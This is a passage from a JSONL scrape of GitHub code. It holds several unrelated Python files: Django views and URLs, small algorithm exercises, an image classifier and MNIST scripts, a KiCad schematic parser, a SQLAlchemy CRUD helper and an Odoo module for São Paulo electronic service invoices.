page\"","repo_name":"G-KrishnaAdithya/AIAS","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"41487152363","text":"def sum_all(arr):\n try:\n total = 0\n for i in range (min(arr), max(arr) + 1):\n total += i\n print(total)\n return total\n except Exception as ex:\n print(ex)\n\nsum_all([4, 1])\n","repo_name":"lraulin/algorithms","sub_path":"py/sum_range.py","file_name":"sum_range.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"11574182991","text":"from argparse import ArgumentParser\nimport numpy as np\nimport torch\nfrom preprocessor import process_image\nfrom model import load_model_from_path\nfrom utils import predict, get_flower_name\n\nparser = ArgumentParser()\nparser.add_argument('image_path')\nparser.add_argument('checkpoint')\nparser.add_argument('--top_k', required=False, default=1, type=int)\nparser.add_argument('--category_names', required=False, default='cat_to_name.json', type=str)\nparser.add_argument('--gpu', required=False, default=True, action=\"store_true\")\n\ndef main():\n args = parser.parse_args()\n device = 'cuda' if args.gpu else 'cpu'\n\n image = process_image(args.image_path)\n image = torch.unsqueeze(image, 0).type(torch.FloatTensor).to(device)\n \n model = load_model_from_path(args.checkpoint, device)\n \n top_p, top_c = predict(image, model, args.top_k)\n \n name = get_flower_name(args.category_names, top_c)\n \n print(f'name: {name}')\n print(f'prob: {[itm for itm in top_p.tolist()[0]]}')\n\n return name, top_p\n \n \n \n \nif __name__=='__main__':\n main()","repo_name":"yeaung276/FlowNN","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10844644234","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 2 18:15:46 2021\n\n@author: Angad\n\"\"\"\n\nimport pandas\nfrom keras.utils import to_categorical\nfrom matplotlib import pyplot\n\ntrain_data = pandas.read_csv('./data/train.csv')\ntrain_y = to_categorical(train_data[\"label\"])\ntrain_x = train_data.loc[:, train_data.columns != \"label\"]\ntrain_x /= 256\ntrain_x = train_x.values.reshape(-1, 28, 28, 1)\n\nn_samples = 25\nfor i in range(n_samples):\n\t# define subplot\n\tpyplot.subplot(5, 5, 1 + i)\n\t# turn off axis labels\n\tpyplot.axis('off')\n\t# plot single image\n\tpyplot.imshow(train_x[i], cmap='gray_r')","repo_name":"angadp/DeepLearning","sub_path":"MNIST/Viz.py","file_name":"Viz.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29221013473","text":"import sys\r\nsys.setrecursionlimit(10000)\r\ninput = sys.stdin.readline\r\n\r\nR,C = map(int,input().split())\r\ngraph = [input().strip() for _ in range(R)]\r\ncheck = [0]*91 # ord 메소드를 이용하기 위한 배열 생성\r\n\r\ndef DFS(x,y,cnt):\r\n global max_cnt\r\n \r\n if cnt > max_cnt: # 값 갱신\r\n max_cnt = cnt\r\n \r\n for i in range(4):\r\n nx = x + dx[i]\r\n ny = y + dy[i]\r\n if 0 <= nx < R and 0 <= ny < C:\r\n if not check[ord(graph[nx][ny])]: # 아직 지나지 않은 알파벳인 경우\r\n check[ord(graph[nx][ny])] = 1 # 지난 알파벳으로 추가\r\n DFS(nx,ny,cnt + 1)\r\n check[ord(graph[nx][ny])] = 0 # 해당 위치에서의 탐색이 종료되었으므로, 다시 지나지 않은 알파벳으로 변경\r\n\r\ndx = [1,-1,0,0] \r\ndy = [0,0,-1,1]\r\ncheck[ord(graph[0][0])] = 1 # 첫 알파벳\r\nmax_cnt = 0\r\nDFS(0,0,1)\r\nprint(max_cnt)","repo_name":"bbbang105/BaekjoonPrac","sub_path":"백준/Gold/1987. 알파벳/알파벳.py","file_name":"알파벳.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6810860112","text":"from django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static \nfrom recipes_app import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"homepage\"), \n path(\"add_recipe/\", views.recipesadd), \n path(\"add_author/\", views.authoradd),\n path(\"recipe//\", views.recipe_view),\n path(\"bio//\", views.author_view),\n path(\"image/\", views.imageadd),\n path(\"success/\", views.success, name=\"success\")\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, \n document_root=settings.MEDIA_ROOT)","repo_name":"mprodhan/RecipeBox-Project","sub_path":"recipes_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"44096691779","text":"# -*- coding: utf-8 -*-\n\nimport sys\nimport shlex\nimport re\n\n\ndef ensure_quoted(s):\n \"\"\"\n Returns a quoted version of string 's' if that's not already the case\n \"\"\"\n rx = r\"^\\\"(.+)\\\"$\"\n\n if re.match(rx, s) is not None:\n return s\n else:\n return \"\\\"{}\\\"\".format(s)\n\n\nclass Description(object):\n \"\"\"\n A class to parse description information of Schematic Files Format of the KiCad\n TODO: Need to be done, currently just stores the raw data read from file\n \"\"\"\n def __init__(self, data):\n self.raw_data = data\n\n\nclass Component(object):\n \"\"\"\n A class to parse components of Schematic Files Format of the KiCad\n \"\"\"\n _L_KEYS = ['name', 'ref']\n _U_KEYS = ['unit', 'convert', 'time_stamp']\n _P_KEYS = ['posx', 'posy']\n _AR_KEYS = ['path', 'ref', 'part']\n _F_KEYS = ['id', 'ref', 'orient', 'posx', 'posy', 'size', 'attributs',\n 'hjust', 'props', 'name']\n\n _KEYS = {'L': _L_KEYS, 'U': _U_KEYS, 'P': _P_KEYS,\n 'AR': _AR_KEYS, 'F': _F_KEYS}\n\n def __init__(self, data):\n self.labels = {}\n self.unit = {}\n self.position = {}\n self.references = []\n self.fields = []\n self.old_stuff = []\n\n for line in data:\n if line[0] == '\\t':\n self.old_stuff.append(line)\n continue\n\n line = line.replace('\\n', '')\n s = shlex.shlex(line)\n s.whitespace_split = True\n s.commenters = ''\n s.quotes = '\"'\n line = list(s)\n\n # select the keys list and default values array\n if line[0] in self._KEYS:\n key_list = self._KEYS[line[0]]\n values = line[1:] + ['']*(len(key_list) - len(line[1:]))\n\n if line[0] == 'L':\n self.labels = dict(zip(key_list, values))\n elif line[0] == 'U':\n self.unit = dict(zip(key_list, values))\n elif line[0] == 'P':\n self.position = dict(zip(key_list, values))\n elif line[0] == 'AR':\n self.references.append(dict(zip(key_list, values)))\n elif line[0] == 'F':\n self.fields.append(dict(zip(key_list, values)))\n\n # TODO: enhancements\n # * 'value' could be used instead of 'ref'\n def addField(self, *, ref, name, **field_data):\n field = {'id': None, 'ref': None, 'orient': 'H', 'posx': '0',\n 'posy': '0', 'size': '50', 'attributs': '0001',\n 'hjust': 'C', 'props': 'CNN', 'name': '~'}\n\n # 'ref' and 'name' must be quoted\n ref = ensure_quoted(ref)\n name = ensure_quoted(name)\n\n # ignore invalid items in field_data\n field_data = {key: val for (key, val) in field_data.items()\n if key in self._F_KEYS}\n\n # merge dictionaries and set the id value\n field.update(field_data, ref=ref, name=name)\n field['id'] = str(len(self.fields))\n\n self.fields.append(field)\n return field\n\n\nclass Sheet(object):\n \"\"\"\n A class to parse sheets of Schematic Files Format of the KiCad\n \"\"\"\n _S_KEYS = ['topLeftPosx', 'topLeftPosy', 'botRightPosx', 'botRightPosy']\n _U_KEYS = ['uniqID']\n _F_KEYS = ['id', 'value', 'IOState', 'side', 'posx', 'posy', 'size']\n\n _KEYS = {'S': _S_KEYS, 'U': _U_KEYS, 'F': _F_KEYS}\n\n def __init__(self, data):\n self.shape = {}\n self.unit = {}\n self.fields = []\n for line in data:\n line = line.replace('\\n', '')\n s = shlex.shlex(line)\n s.whitespace_split = True\n s.commenters = ''\n s.quotes = '\"'\n line = list(s)\n # select the keys list and default values array\n if line[0] in self._KEYS:\n key_list = self._KEYS[line[0]]\n values = line[1:] + ['']*(len(key_list) - len(line[1:]))\n if line[0] == 'S':\n self.shape = dict(zip(key_list, values))\n elif line[0] == 'U':\n self.unit = dict(zip(key_list, values))\n elif line[0][0] == 'F':\n key_list = self._F_KEYS\n values = line + ['' for n in range(len(key_list) - len(line))]\n self.fields.append(dict(zip(key_list, values)))\n\n\nclass Bitmap(object):\n \"\"\"\n A class to parse bitmaps of Schematic Files Format of the KiCad\n TODO: Need to be done, currently just stores the raw data read from file\n \"\"\"\n def __init__(self, data):\n self.raw_data = data\n\n\nclass Schematic(object):\n \"\"\"\n A class to parse Schematic Files Format of the KiCad\n \"\"\"\n def __init__(self, filename):\n f = open(filename)\n self.filename = filename\n self.header = f.readline()\n self.libs = []\n self.eelayer = None\n self.description = None\n self.components = []\n self.sheets = []\n self.bitmaps = []\n self.texts = []\n self.wires = []\n self.entries = []\n self.conns = []\n self.noconns = []\n\n if 'EESchema Schematic File' not in self.header:\n self.header = None\n sys.stderr.write('The file is not a KiCad Schematic File\\n')\n return\n\n building_block = False\n\n while True:\n line = f.readline()\n if not line:\n break\n\n if line.startswith('LIBS:'):\n self.libs.append(line)\n\n elif line.startswith('EELAYER END'):\n pass\n elif line.startswith('EELAYER'):\n self.eelayer = line\n\n elif not building_block:\n if line.startswith('$'):\n building_block = True\n block_data = []\n block_data.append(line)\n elif line.startswith('Text'):\n data = {'desc': line, 'data': f.readline()}\n self.texts.append(data)\n elif line.startswith('Wire'):\n data = {'desc': line, 'data': f.readline()}\n self.wires.append(data)\n elif line.startswith('Entry'):\n data = {'desc': line, 'data': f.readline()}\n self.entries.append(data)\n elif line.startswith('Connection'):\n data = {'desc': line}\n self.conns.append(data)\n elif line.startswith('NoConn'):\n data = {'desc': line}\n self.noconns.append(data)\n\n elif building_block:\n block_data.append(line)\n if line.startswith('$End'):\n building_block = False\n\n if line.startswith('$EndDescr'):\n self.description = Description(block_data)\n if line.startswith('$EndComp'):\n self.components.append(Component(block_data))\n if line.startswith('$EndSheet'):\n self.sheets.append(Sheet(block_data))\n if line.startswith('$EndBitmap'):\n self.bitmaps.append(Bitmap(block_data))\n\n def save(self, filename=None):\n # check whether it has header, what means that sch file was loaded fine\n if not self.header:\n return\n\n if not filename:\n filename = self.filename\n\n # insert the header\n to_write = []\n to_write += [self.header]\n\n # LIBS\n to_write += self.libs\n\n # EELAYER\n to_write += [self.eelayer, 'EELAYER END\\n']\n\n # Description\n to_write += self.description.raw_data\n\n # Sheets\n for sheet in self.sheets:\n to_write += ['$Sheet\\n']\n if sheet.shape:\n line = 'S '\n for key in sheet._S_KEYS:\n line += sheet.shape[key] + ' '\n to_write += [line.rstrip() + '\\n']\n if sheet.unit:\n line = 'U '\n for key in sheet._U_KEYS:\n line += sheet.unit[key] + ' '\n to_write += [line.rstrip() + '\\n']\n\n for field in sheet.fields:\n line = ''\n for key in sheet._F_KEYS:\n line += field[key] + ' '\n to_write += [line.rstrip() + '\\n']\n to_write += ['$EndSheet\\n']\n\n # Components\n for component in self.components:\n to_write += ['$Comp\\n']\n if component.labels:\n line = 'L '\n for key in component._L_KEYS:\n line += component.labels[key] + ' '\n to_write += [line.rstrip() + '\\n']\n\n if component.unit:\n line = 'U '\n for key in component._U_KEYS:\n line += component.unit[key] + ' '\n to_write += [line.rstrip() + '\\n']\n\n if component.position:\n line = 'P '\n for key in component._P_KEYS:\n line += component.position[key] + ' '\n to_write += [line.rstrip() + '\\n']\n\n for reference in component.references:\n if component.references:\n line = 'AR '\n for key in component._AR_KEYS:\n line += reference[key] + ' '\n to_write += [line.rstrip() + '\\n']\n\n for field in component.fields:\n line = 'F '\n for key in component._F_KEYS:\n line += field[key] + ' '\n to_write += [line.rstrip() + '\\n']\n\n if component.old_stuff:\n to_write += component.old_stuff\n\n to_write += ['$EndComp\\n']\n\n # Bitmaps\n for bitmap in self.bitmaps:\n to_write += bitmap.raw_data\n\n # Texts\n for text in self.texts:\n to_write += [text['desc'], text['data']]\n\n # Wires\n for wire in self.wires:\n to_write += [wire['desc'], wire['data']]\n\n # Entries\n for entry in self.entries:\n to_write += [entry['desc'], entry['data']]\n\n # Connections\n for conn in self.conns:\n to_write += [conn['desc']]\n\n # No Connetions\n for noconn in self.noconns:\n to_write += [noconn['desc']]\n\n to_write += ['$EndSCHEMATC\\n']\n\n f = open(filename, 'w')\n f.writelines(to_write)\n","repo_name":"KiCad/kicad-library-utils","sub_path":"sch/sch.py","file_name":"sch.py","file_ext":"py","file_size_in_byte":10501,"program_lang":"python","lang":"en","doc_type":"code","stars":127,"dataset":"github-code","pt":"32"} +{"seq_id":"24817149920","text":"from sqlalchemy.orm import Session\nfrom app.crud.base import CRUDBase\nfrom app.models.train_game import TrainGame\nfrom app.schemas.train_game import TrainGameCreate, TrainGameUpdate\n\n\nclass CRUDTrainGame(CRUDBase[TrainGame, TrainGameCreate, TrainGameUpdate]):\n # Declare model specific CRUD operation methods.\n def create_train_game(self, db: Session, match_id_set):\n match_id_list = list(match_id_set)\n query = \"\"\n for match_id in match_id_list:\n if query == \"\":\n query = f\"('{match_id}', false)\"\n else:\n query += f\",('{match_id}', false)\"\n db.execute(\n f\"INSERT INTO train_game (match_id, is_parsed) VALUES {query} ON CONFLICT (match_id) DO NOTHING\")\n db.commit()\n return\n\n def get_train_game(self, db: Session):\n train_game_list = db.query(self.model).filter(\n self.model.is_parsed == False).all()\n return train_game_list\n\n def update_is_parsed(self, db: Session, file_title):\n\n file_name = file_title.split('.')[0]\n print(file_name)\n match_id = file_name.split('_')[1]\n print(match_id)\n db.query(self.model).filter(self.model.match_id ==\n match_id).update({self.model.is_parsed: True})\n db.commit()\n\n\ntrain_game = CRUDTrainGame(TrainGame)\n","repo_name":"fifteen-GG/15GG","sub_path":"15GG_back/app/crud/train_game.py","file_name":"train_game.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22937891707","text":"import xml.etree.ElementTree as ET\nfrom datetime import datetime\n\nfrom erpbrasil.base import misc\nfrom nfselib.paulistana.v02.PedidoEnvioLoteRPS import (\n CabecalhoType,\n PedidoEnvioLoteRPS,\n tpChaveRPS,\n tpCPFCNPJ,\n tpEndereco,\n tpRPS,\n)\nfrom unidecode import unidecode\n\nfrom odoo import _, models\nfrom odoo.exceptions import UserError\n\nfrom odoo.addons.l10n_br_fiscal.constants.fiscal import (\n EVENT_ENV_HML,\n EVENT_ENV_PROD,\n MODELO_FISCAL_NFSE,\n PROCESSADOR_OCA,\n SITUACAO_EDOC_AUTORIZADA,\n SITUACAO_EDOC_REJEITADA,\n)\n\nfrom ..constants.paulistana import CONSULTA_LOTE, ENVIO_LOTE_RPS\n\n\ndef filter_oca_nfse(record):\n if record.processador_edoc == PROCESSADOR_OCA and record.document_type_id.code in [\n MODELO_FISCAL_NFSE,\n ]:\n return True\n return False\n\n\ndef filter_paulistana(record):\n if record.company_id.provedor_nfse == \"paulistana\":\n return True\n return False\n\n\nclass Document(models.Model):\n _inherit = \"l10n_br_fiscal.document\"\n\n def convert_type_nfselib(self, class_object, object_filed, value):\n if value is None:\n return value\n\n value_type = \"\"\n for field in class_object().member_data_items_:\n if field.name == object_filed:\n value_type = field.child_attrs.get(\"type\", \"\").replace(\"xs:\", \"\")\n break\n\n if value_type in (\"int\", \"long\", \"byte\", \"nonNegativeInteger\"):\n return int(value)\n elif value_type == \"decimal\":\n return round(float(value), 2)\n elif value_type == \"string\":\n return str(value)\n else:\n return value\n\n def _serialize(self, edocs):\n edocs = super()._serialize(edocs)\n for record in self.filtered(filter_oca_nfse).filtered(filter_paulistana):\n edocs.append(record.serialize_nfse_paulistana())\n return edocs\n\n def serialize_nfse_paulistana(self):\n dados_lote_rps = self._prepare_lote_rps()\n dados_servico = self._prepare_dados_servico()\n lote_rps = PedidoEnvioLoteRPS(\n Cabecalho=self._serialize_cabecalho(dados_lote_rps),\n RPS=[self._serialize_lote_rps(dados_lote_rps, dados_servico)],\n )\n return lote_rps\n\n def _serialize_cabecalho(self, dados_lote_rps):\n return CabecalhoType(\n Versao=self.convert_type_nfselib(CabecalhoType, \"Versao\", 1),\n CPFCNPJRemetente=tpCPFCNPJ(\n CNPJ=self.convert_type_nfselib(\n CabecalhoType, \"tpCPFCNPJ\", dados_lote_rps[\"cnpj\"]\n )\n ),\n transacao=False, # TODO: Verficar origem do dado\n dtInicio=self.convert_type_nfselib(\n CabecalhoType,\n \"dtInicio\",\n dados_lote_rps[\"date_in_out\"].split(\"T\", 1)[0],\n ),\n dtFim=self.convert_type_nfselib(\n CabecalhoType, \"dtFim\", dados_lote_rps[\"date_in_out\"].split(\"T\", 1)[0]\n ),\n QtdRPS=self.convert_type_nfselib(CabecalhoType, \"QtdRPS\", \"1\"),\n ValorTotalServicos=self.convert_type_nfselib(\n CabecalhoType, \"ValorTotalServicos\", dados_lote_rps[\"total_recebido\"]\n ),\n ValorTotalDeducoes=self.convert_type_nfselib(\n CabecalhoType, \"ValorTotalDeducoes\", dados_lote_rps[\"carga_tributaria\"]\n ),\n )\n\n def _serialize_lote_rps(self, dados_lote_rps, dados_servico):\n dados_tomador = self._prepare_dados_tomador()\n return tpRPS(\n Assinatura=self.assinatura_rps(\n dados_lote_rps, dados_servico, dados_tomador\n ),\n ChaveRPS=tpChaveRPS(\n InscricaoPrestador=self.convert_type_nfselib(\n tpChaveRPS,\n \"InscricaoPrestador\",\n dados_lote_rps[\"inscricao_municipal\"].zfill(8),\n ),\n SerieRPS=self.convert_type_nfselib(\n tpChaveRPS, \"SerieRPS\", dados_lote_rps[\"serie\"]\n ),\n NumeroRPS=self.convert_type_nfselib(\n tpChaveRPS, \"NumeroRPS\", dados_lote_rps[\"numero\"]\n ),\n ),\n TipoRPS=self._map_type_rps(dados_lote_rps[\"tipo\"]),\n DataEmissao=self.convert_type_nfselib(\n tpRPS, \"DataEmissao\", dados_lote_rps[\"data_emissao\"].split(\"T\", 1)[0]\n ),\n StatusRPS=self.convert_type_nfselib(tpRPS, \"StatusRPS\", \"N\"),\n TributacaoRPS=self.convert_type_nfselib(\n tpRPS,\n \"TributacaoRPS\",\n self._map_taxation_rps(dados_lote_rps[\"natureza_operacao\"]),\n ),\n ValorServicos=self.convert_type_nfselib(\n tpRPS, \"ValorServicos\", dados_servico[\"valor_servicos\"]\n ),\n ValorDeducoes=self.convert_type_nfselib(\n tpRPS, \"ValorDeducoes\", dados_servico[\"valor_deducoes\"]\n ),\n ValorPIS=self.convert_type_nfselib(\n tpRPS, \"ValorPIS\", dados_servico[\"valor_pis_retido\"]\n ),\n ValorCOFINS=self.convert_type_nfselib(\n tpRPS, \"ValorCOFINS\", dados_servico[\"valor_cofins_retido\"]\n ),\n ValorINSS=self.convert_type_nfselib(\n tpRPS, \"ValorINSS\", dados_servico[\"valor_inss_retido\"]\n ),\n ValorIR=self.convert_type_nfselib(\n tpRPS, \"ValorIR\", dados_servico[\"valor_ir_retido\"]\n ),\n ValorCSLL=self.convert_type_nfselib(\n tpRPS, \"ValorCSLL\", dados_servico[\"valor_csll_retido\"]\n ),\n CodigoServico=self.convert_type_nfselib(\n tpRPS, \"CodigoServico\", dados_servico[\"codigo_tributacao_municipio\"]\n ),\n AliquotaServicos=self.convert_type_nfselib(\n tpRPS, \"AliquotaServicos\", dados_servico[\"aliquota\"]\n ),\n ISSRetido=\"true\" if dados_servico[\"iss_retido\"] == \"1\" else \"false\",\n # FIXME: Hardcoded\n CPFCNPJTomador=self.convert_type_nfselib(\n tpRPS,\n \"CPFCNPJTomador\",\n tpCPFCNPJ(CNPJ=dados_tomador[\"cnpj\"], CPF=dados_tomador[\"cpf\"]),\n ),\n InscricaoMunicipalTomador=self.convert_type_nfselib(\n tpRPS,\n \"InscricaoMunicipalTomador\",\n dados_tomador[\"inscricao_municipal\"],\n )\n if dados_tomador[\"codigo_municipio\"]\n == int(\"%s\" % (self.company_id.partner_id.city_id.ibge_code))\n else None,\n InscricaoEstadualTomador=self.convert_type_nfselib(\n tpRPS, \"InscricaoEstadualTomador\", dados_tomador[\"inscricao_estadual\"]\n ),\n RazaoSocialTomador=self.convert_type_nfselib(\n tpRPS, \"RazaoSocialTomador\", dados_tomador[\"razao_social\"]\n ),\n EnderecoTomador=tpEndereco(\n Logradouro=self.convert_type_nfselib(\n tpEndereco, \"Logradouro\", dados_tomador[\"endereco\"]\n ),\n NumeroEndereco=self.convert_type_nfselib(\n tpEndereco, \"NumeroEndereco\", dados_tomador[\"numero\"]\n ),\n ComplementoEndereco=self.convert_type_nfselib(\n tpEndereco, \"ComplementoEndereco\", dados_tomador[\"complemento\"]\n ),\n Bairro=self.convert_type_nfselib(\n tpEndereco, \"Bairro\", dados_tomador[\"bairro\"]\n ),\n Cidade=self.convert_type_nfselib(\n tpEndereco, \"Cidade\", dados_tomador[\"codigo_municipio\"]\n ),\n UF=self.convert_type_nfselib(tpEndereco, \"UF\", dados_tomador[\"uf\"]),\n CEP=self.convert_type_nfselib(tpEndereco, \"CEP\", dados_tomador[\"cep\"]),\n ),\n EmailTomador=self.convert_type_nfselib(\n tpRPS, \"EmailTomador\", dados_tomador[\"email\"]\n ),\n Discriminacao=self.convert_type_nfselib(\n tpRPS,\n \"Discriminacao\",\n unidecode(\n dados_servico[\"discriminacao\"]\n + (\n \"|%s|\" % self.fiscal_additional_data.replace(\"\\n\", \"|\")\n if self.fiscal_additional_data\n else \"\"\n )\n ),\n ),\n ValorCargaTributaria=self.convert_type_nfselib(\n tpRPS,\n \"ValorCargaTributaria\",\n dados_lote_rps[\"carga_tributaria_estimada\"],\n ),\n FonteCargaTributaria=self.convert_type_nfselib(\n tpRPS, \"FonteCargaTributaria\", \"IBPT\"\n ),\n MunicipioPrestacao=self.convert_type_nfselib(\n CabecalhoType,\n \"Versao\",\n self._map_provision_municipality(\n dados_lote_rps[\"natureza_operacao\"],\n dados_servico[\"codigo_municipio\"],\n ),\n ),\n )\n\n def _serialize_rps(self, dados):\n return tpRPS(\n InscricaoMunicipalTomador=self.convert_type_nfselib(\n tpRPS, \"InscricaoMunicipalTomador\", dados[\"inscricao_municipal\"]\n ),\n CPFCNPJTomador=tpCPFCNPJ(\n Cnpj=self.convert_type_nfselib(tpCPFCNPJ, \"Cnpj\", dados[\"cnpj\"]),\n Cpf=self.convert_type_nfselib(tpCPFCNPJ, \"Cpf\", dados[\"cpf\"]),\n ),\n RazaoSocialTomador=self.convert_type_nfselib(\n tpRPS, \"RazaoSocialTomador\", dados[\"razao_social\"]\n ),\n EnderecoTomador=tpEndereco(\n Logradouro=self.convert_type_nfselib(\n tpEndereco, \"Logradouro\", dados[\"endereco\"]\n ),\n NumeroEndereco=self.convert_type_nfselib(\n tpEndereco, \"NumeroEndereco\", dados[\"numero\"]\n ),\n ComplementoEndereco=self.convert_type_nfselib(\n tpEndereco, \"ComplementoEndereco\", dados[\"complemento\"]\n ),\n Bairro=self.convert_type_nfselib(tpEndereco, \"Bairro\", dados[\"bairro\"]),\n Cidade=self.convert_type_nfselib(\n tpEndereco, \"Cidade\", dados[\"codigo_municipio\"]\n ),\n UF=self.convert_type_nfselib(tpEndereco, \"UF\", dados[\"uf\"]),\n CEP=self.convert_type_nfselib(tpEndereco, \"CEP\", dados[\"cep\"]),\n )\n or None,\n )\n\n def assinatura_rps(self, dados_lote_rps, dados_servico, dados_tomador):\n assinatura = \"\"\n\n assinatura += dados_lote_rps[\"inscricao_municipal\"].zfill(8)\n assinatura += dados_lote_rps[\"serie\"].ljust(5, \" \")\n assinatura += dados_lote_rps[\"numero\"].zfill(12)\n assinatura += datetime.strptime(\n dados_lote_rps[\"data_emissao\"], \"%Y-%m-%dT%H:%M:%S\"\n ).strftime(\"%Y%m%d\")\n assinatura += self._map_taxation_rps(dados_lote_rps[\"natureza_operacao\"])\n assinatura += \"N\" # Corrigir - Verificar status do RPS\n assinatura += \"S\" if dados_servico[\"iss_retido\"] == \"1\" else \"N\"\n assinatura += (\n (\"%.2f\" % dados_servico[\"valor_servicos\"]).replace(\".\", \"\").zfill(15)\n )\n assinatura += (\n (\"%.2f\" % dados_lote_rps[\"carga_tributaria\"]).replace(\".\", \"\").zfill(15)\n )\n assinatura += dados_servico[\"codigo_tributacao_municipio\"].zfill(5)\n assinatura += \"2\" if dados_tomador[\"cnpj\"] else \"1\"\n assinatura += (dados_tomador[\"cnpj\"] or dados_tomador[\"cpf\"]).zfill(14)\n # assinatura += '3'\n # assinatura += ''.zfill(14)\n # assinatura += 'N'\n\n return assinatura\n\n def _map_taxation_rps(self, operation_nature):\n # FIXME: Lidar com diferença de tributado em São Paulo ou não\n dict_taxation = {\n \"1\": \"T\",\n \"2\": \"F\",\n \"3\": \"A\",\n \"4\": \"R\",\n \"5\": \"X\",\n \"6\": \"X\",\n }\n\n return dict_taxation[operation_nature]\n\n def _map_provision_municipality(self, operation_nature, municipal_code):\n if operation_nature == \"1\":\n return None\n else:\n return municipal_code\n\n def _map_type_rps(self, rps_type):\n dict_type_rps = {\n \"1\": \"RPS\",\n \"2\": \"RPS-M\",\n \"3\": \"RPS-C\",\n }\n\n return dict_type_rps[rps_type]\n\n def _eletronic_document_send(self):\n super()._eletronic_document_send()\n for record in self.filtered(filter_oca_nfse).filtered(filter_paulistana):\n processador = record._processador_erpbrasil_nfse()\n\n protocolo = record.authorization_protocol\n vals = dict()\n\n if not protocolo:\n for edoc in record.serialize():\n processo = None\n for p in processador.processar_documento(edoc):\n processo = p\n retorno = ET.fromstring(processo.retorno)\n\n if processo.webservice in CONSULTA_LOTE:\n if processo.resposta.Cabecalho.Sucesso:\n nfse = retorno.find(\".//NFe\")\n # TODO: Verificar resposta do ConsultarLote\n vals[\"document_number\"] = nfse.find(\".//NumeroNFe\").text\n vals[\"authorization_date\"] = nfse.find(\n \".//DataEmissaoRPS\"\n ).text\n vals[\"verify_code\"] = nfse.find(\n \".//CodigoVerificacao\"\n ).text\n record.authorization_event_id.set_done(\n status_code=4,\n response=vals[\"status_name\"],\n protocol_date=vals[\"authorization_date\"],\n protocol_number=protocolo,\n file_response_xml=processo.retorno,\n )\n continue\n\n if processo.webservice in ENVIO_LOTE_RPS:\n if retorno:\n if processo.resposta.Cabecalho.Sucesso:\n record._change_state(SITUACAO_EDOC_AUTORIZADA)\n vals[\"status_name\"] = _(\"Procesado com Sucesso\")\n vals[\"status_code\"] = 4\n vals[\"edoc_error_message\"] = \"\"\n else:\n mensagem_erro = \"\"\n for erro in retorno.findall(\"Erro\"):\n codigo = erro.find(\"Codigo\").text\n descricao = erro.find(\"Descricao\").text\n mensagem_erro += (\n codigo + \" - \" + descricao + \"\\n\"\n )\n\n vals[\"edoc_error_message\"] = mensagem_erro\n vals[\"status_name\"] = _(\"Procesado com Erro\")\n vals[\"status_code\"] = 3\n record._change_state(SITUACAO_EDOC_REJEITADA)\n record.write(vals)\n return\n\n def _document_status(self):\n for record in self.filtered(filter_oca_nfse).filtered(filter_paulistana):\n processador = record._processador_erpbrasil_nfse()\n processo = processador.consulta_nfse_rps(\n numero_rps=record.rps_number,\n serie_rps=record.document_serie,\n insc_prest=misc.punctuation_rm(\n record.company_id.partner_id.inscr_mun or \"\"\n )\n or None,\n cnpj_prest=misc.punctuation_rm(record.company_id.partner_id.cnpj_cpf),\n )\n consulta = processador.analisa_retorno_consulta(processo)\n if isinstance(consulta, dict):\n record.write(\n {\n \"verify_code\": consulta[\"codigo_verificacao\"],\n \"document_number\": consulta[\"numero\"],\n \"authorization_date\": consulta[\"data_emissao\"],\n }\n )\n record.authorization_event_id.set_done(\n status_code=4,\n response=_(\"Procesado com Sucesso\"),\n protocol_date=consulta[\"data_emissao\"],\n protocol_number=record.authorization_protocol,\n file_response_xml=processo.retorno,\n )\n return _(consulta)\n\n def cancel_document_paulistana(self):\n def doc_dict(record):\n return {\n \"numero_nfse\": record.document_number,\n \"codigo_verificacao\": record.verify_code,\n }\n\n for record in self.filtered(filter_oca_nfse).filtered(filter_paulistana):\n processador = record._processador_erpbrasil_nfse()\n processo = processador.cancela_documento(doc_numero=doc_dict(record))\n\n status, message = processador.analisa_retorno_cancelamento_paulistana(\n processo\n )\n\n if not status:\n raise UserError(_(message))\n\n record.cancel_event_id = record.event_ids.create_event_save_xml(\n company_id=record.company_id,\n environment=(\n EVENT_ENV_PROD if record.nfse_environment == \"1\" else EVENT_ENV_HML\n ),\n event_type=\"2\",\n xml_file=processo.envio_xml,\n document_id=record,\n )\n\n return status\n\n def _exec_before_SITUACAO_EDOC_CANCELADA(self, old_state, new_state):\n super()._exec_before_SITUACAO_EDOC_CANCELADA(old_state, new_state)\n return self.cancel_document_paulistana()\n","repo_name":"OCA/l10n-brazil","sub_path":"l10n_br_nfse_paulistana/models/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":18250,"program_lang":"python","lang":"pt","doc_type":"code","stars":196,"dataset":"github-code","pt":"32"} +{"seq_id":"37881710398","text":"import uuid\nfrom rest_framework.views import APIView\nfrom rest_framework.views import status\nfrom xenomorph_api.apps.tracking.api.services import TrackingService\nfrom xenomorph_api.apps.email_service import send_email\nfrom xenomorph_api.apps.tracking.models import (\n Tracks,\n Mark\n)\nfrom xenomorph_api.apps.services import success_response\nfrom xenomorph_api.apps.tracking.api.v1.serializers import (\n TrackingSerializer,\n UserFeedbackSerializer\n)\nfrom rest_framework_simplejwt.authentication import JWTAuthentication\nfrom rest_framework.permissions import IsAuthenticated\n\n\nclass TrackingAPIView(APIView):\n # authentication_classes = [JWTAuthentication]\n # permission_classes = [IsAuthenticated]\n\n @staticmethod\n def 